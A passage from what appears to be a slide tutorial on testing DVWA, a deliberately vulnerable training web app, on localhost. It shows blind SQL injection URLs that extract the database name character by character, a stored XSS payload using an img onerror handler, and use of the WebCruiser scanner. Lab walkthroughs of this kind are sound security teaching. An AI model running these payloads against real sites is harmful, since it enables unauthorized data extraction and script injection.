  • 9. The ASCII of the first byte is 100, it is d, and so on. http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),2,1)) )=118 and %271%27=%271 , the second byte is v . http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),3,1)) )=119 and %271%27=%271 ,the third byte is w . http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),4,1)) )=97 and %271%27=%271 ,the fourth byte is a . Got the full name of database is “dvwa” . Is there a tool which can do these tests instead? Yes, we can use a web application security scanner to do it. Take WebCruiser as an illustration, navigate page and click “ScanURL”: SQL Injection vulnerabilities found. Right click vulnerability and select “SQL INJECTION POC”,
  • 10. continue click ”Get Environment Information”: 4. XSS Select XSS from the menu, http://127.0.0.1/dvwa/vulnerabilities/xss_s/ Input text and script directly in the title and content field, such as: testinput<img src=0 onerror="alert(123456)"> Or use scanner, it found 2 XSS vulnerabilities.
  • 11. Note: In order to improve efficiency, WebCruiser Web Vulnerability Scanner can scan designated vulnerability type (setting) or designated URL (ScanURL button) separately.